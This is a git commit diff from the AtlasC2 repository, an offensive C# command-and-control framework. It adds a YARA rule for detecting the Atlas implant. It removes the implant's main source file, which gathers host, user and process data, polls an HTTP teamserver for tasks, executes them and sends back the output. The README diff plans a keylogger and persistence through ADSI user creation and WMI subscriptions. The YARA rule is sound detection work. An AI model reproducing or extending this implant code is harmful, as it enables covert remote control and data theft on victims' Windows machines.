Merge branch 'master' of https://github.com/Gr1mmie/AtlasC2
This commit is contained in:
commit
cce198924f
|
@ -0,0 +1,4 @@
|
||||||
|
# These are supported funding model platforms
|
||||||
|
|
||||||
|
github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
|
||||||
|
ko_fi: grimmie
|
|
@ -0,0 +1,61 @@
|
||||||
|
rule AtlasImplant_Yara {
|
||||||
|
meta:
|
||||||
|
last_updated = "3-20-2022"
|
||||||
|
author = "Grimmie (@Gr1mmie)"
|
||||||
|
description = "Searches for strings present in the Atlas C2 Implant"
|
||||||
|
md5 = "7bbb5fce0b18f613674fd09da14e5e45"
|
||||||
|
|
||||||
|
strings:
|
||||||
|
// system namespaces
|
||||||
|
$systemNamespace1 = "System.Net" ascii
|
||||||
|
$systemNamespace2 = "System.Text" ascii
|
||||||
|
$systemNamespace3 = "System.Linq" ascii
|
||||||
|
$systemNamespace4 = "System.Timers" ascii
|
||||||
|
$systemNamespace5 = "System.Runtime" ascii
|
||||||
|
$systemNamespace6 = "System.Reflection" ascii
|
||||||
|
$systemNamespace7 = "System.Collections" ascii
|
||||||
|
$systemNamespace8 = "System.Diagnostics" ascii
|
||||||
|
$systemNamespace9 = "System.Security" ascii
|
||||||
|
$systemNamespace10 = "System.Management.Automation" ascii
|
||||||
|
|
||||||
|
// misc stuffs
|
||||||
|
$misc1 = "ImplantDataUtils" ascii
|
||||||
|
$misc2 = "ImplantTaskUtils" ascii
|
||||||
|
$misc3 = "ImplantOptionUtils" ascii
|
||||||
|
$misc4 = "ImplantCommands" ascii
|
||||||
|
$misc5 = "ImplantTask" ascii
|
||||||
|
$misc6 = "ImplantTaskOptions" ascii
|
||||||
|
$misc7 = "ImplantOptions" ascii
|
||||||
|
$misc8 = "ImplantCommandsInit" ascii
|
||||||
|
$misc9 = "ImplantInit" ascii
|
||||||
|
$misc10 = "PollImplant" ascii
|
||||||
|
$misc11 = "ImplantTaskOut" ascii
|
||||||
|
|
||||||
|
// comms stuffs
|
||||||
|
$comms1 = "+Implant.Models.HTTPComms+<PollImplant>d__16" ascii
|
||||||
|
$comms2 = "(Implant.Models.HTTPComms+<PostData>d__18" ascii
|
||||||
|
$comms3 = "%Implant.Models.HTTPComms+<Start>d__19" ascii
|
||||||
|
|
||||||
|
// getter stuffs
|
||||||
|
$get1 = "get_assemParams" ascii
|
||||||
|
$get2 = "get_assemBytes" ascii
|
||||||
|
$get3 = "get_targetDir" ascii
|
||||||
|
$get4 = "get_procIDLen" ascii
|
||||||
|
$get5 = "get_procSessionIDLen" ascii
|
||||||
|
$get6 = "get_procNameLen" ascii
|
||||||
|
$get7 = "get_fileNameLen" ascii
|
||||||
|
$get8 = "get_dirNameLen" ascii
|
||||||
|
$get9 = "get_fileSizeLen" ascii
|
||||||
|
$get10 = "get_CurrentDomain" ascii
|
||||||
|
$get11 = "get_IsCancellationRequested" ascii
|
||||||
|
$get12 = "get_Command" ascii
|
||||||
|
$get13 = "get_assemMethod" ascii
|
||||||
|
|
||||||
|
condition:
|
||||||
|
uint16(0) == 0x5A4D and
|
||||||
|
all of $systemNamespace* and
|
||||||
|
all of $misc* and
|
||||||
|
all of $comms* and
|
||||||
|
3 of $get*
|
||||||
|
|
||||||
|
}
|
|
@ -1,87 +0,0 @@
|
||||||
using System;
|
|
||||||
using System.Collections.Generic;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Linq;
|
|
||||||
using System.Reflection;
|
|
||||||
using System.Threading;
|
|
||||||
|
|
||||||
using Implant.Models;
|
|
||||||
using Implant.Utils;
|
|
||||||
|
|
||||||
namespace Implant
|
|
||||||
{
|
|
||||||
class Program
|
|
||||||
{
|
|
||||||
private static ImplantData _implantData;
|
|
||||||
private static Comms _comms;
|
|
||||||
private static CancellationTokenSource _cancelToken;
|
|
||||||
|
|
||||||
private static List<ImplantCommands> _commands = new List<ImplantCommands>();
|
|
||||||
|
|
||||||
//put into utils
|
|
||||||
public static void GenImplantData(){
|
|
||||||
var proc = Process.GetCurrentProcess();
|
|
||||||
|
|
||||||
_implantData = new ImplantData {
|
|
||||||
// get DNS hostname
|
|
||||||
ID = ImplantDataUtils.GenImplantName(), HostName = Environment.MachineName,
|
|
||||||
User = Environment.UserName, Integrity = ImplantDataUtils.ReturnIntegrity(),
|
|
||||||
Arch = ImplantDataUtils.ReturnArch(),
|
|
||||||
ProcID = proc.Id, ProcName = proc.ProcessName,
|
|
||||||
IPAddr = ImplantDataUtils.GetHostIP()
|
|
||||||
};
|
|
||||||
|
|
||||||
proc.Dispose();
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void SendTaskOut(string _id, string _out) {
|
|
||||||
var taskOut = new ImplantTaskOut { Id = _id, TaskOut = _out };
|
|
||||||
_comms.DataSend(taskOut);
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void HandleTask(ImplantTask task) {
|
|
||||||
var command = _commands.FirstOrDefault(cmd => cmd.Name.Equals(task.Command, StringComparison.InvariantCultureIgnoreCase));
|
|
||||||
if (command is null) { return; }
|
|
||||||
|
|
||||||
var _out = command.Execute(task);
|
|
||||||
SendTaskOut(task.Id, _out);
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void HandleTasks(IEnumerable<ImplantTask> tasks) {
|
|
||||||
foreach (var task in tasks) { HandleTask(task); }
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void ImplantCommandsInit()
|
|
||||||
{
|
|
||||||
foreach (Type type in Assembly.GetExecutingAssembly().GetTypes())
|
|
||||||
{
|
|
||||||
if (type.IsSubclassOf(typeof(ImplantCommands)))
|
|
||||||
{
|
|
||||||
ImplantCommands cmd = Activator.CreateInstance(type) as ImplantCommands;
|
|
||||||
_commands.Add(cmd);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public void Stop() { _cancelToken.Cancel(); }
|
|
||||||
|
|
||||||
static void Main(string[] args) {
|
|
||||||
|
|
||||||
Thread.Sleep(10000);
|
|
||||||
|
|
||||||
GenImplantData();
|
|
||||||
ImplantCommandsInit();
|
|
||||||
|
|
||||||
_comms = new HTTPComms("localhost", 8080);
|
|
||||||
_comms.ImplantInit(_implantData);
|
|
||||||
_comms.Start();
|
|
||||||
|
|
||||||
_cancelToken = new CancellationTokenSource();
|
|
||||||
|
|
||||||
while (!_cancelToken.IsCancellationRequested) {
|
|
||||||
if (_comms.DataRecv(out var tasks)) { HandleTasks(tasks); }
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
}
|
|
||||||
}
|
|
|
@ -1,7 +1,7 @@
|
||||||
# AtlasC2
|
# AtlasC2
|
||||||
C# C2 Framework centered around Stage 1 operations
|
C# C2 Framework centered around Stage 1 operations
|
||||||
|
|
||||||
Atlas is based around gaining a foothold within an environment and further utilizing it to smuggle in C# (currently strictly C#) weaponry utilizing an HTTP based implant. Isn't exactly very OPSEC safe in it's current state...at all.
|
Atlas is based around gaining a foothold within an environment and further utilizing it to smuggle in C# (currently strictly C#) weaponry utilizing an HTTP based implant. Isn't exactly very OPSEC safe in it's current state...at all. Currently targets only windows environments
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
|
|
||||||
|
@ -77,7 +77,8 @@ Open .sln and build all 3 components in Release mode
|
||||||
* Add admin utils:
|
* Add admin utils:
|
||||||
* `cp`
|
* `cp`
|
||||||
* `upload`/`download`
|
* `upload`/`download`
|
||||||
* Some barebones persistence commands (idk something like creating a user via ADSI)
|
* Keylogger (probs make standalone to load into implant)
|
||||||
|
* Some barebones persistence commands (idk something like creating a user via ADSI, WMI subscription creation. probs make these standalone assems to load into implant)
|
||||||
* Allow for the changing of the sleep timing on implant and implement jitter
|
* Allow for the changing of the sleep timing on implant and implement jitter
|
||||||
* Allow for operator to change port TeamServer starts on via CLI
|
* Allow for operator to change port TeamServer starts on via CLI
|
||||||
* Encrypted comms (yikes, ik)
|
* Encrypted comms (yikes, ik)
|
||||||
|
@ -90,8 +91,5 @@ Open .sln and build all 3 components in Release mode
|
||||||
* Shellcode generation via Donut
|
* Shellcode generation via Donut
|
||||||
* BOFs would be cool
|
* BOFs would be cool
|
||||||
|
|
||||||
|
|
||||||
### Note To Self: u forgot YARA rule. dewit
|
|
||||||
|
|
||||||
## Disclaimer
|
## Disclaimer
|
||||||
Atlas was designed soley for educational/ethical purposes. I do not condone nor am I responsible for actions taken by users of Atlas
|
Atlas was designed soley for educational/ethical purposes. I do not condone nor am I responsible for actions taken by users of Atlas
|
||||||
|
|
Loading…
Reference in New Issue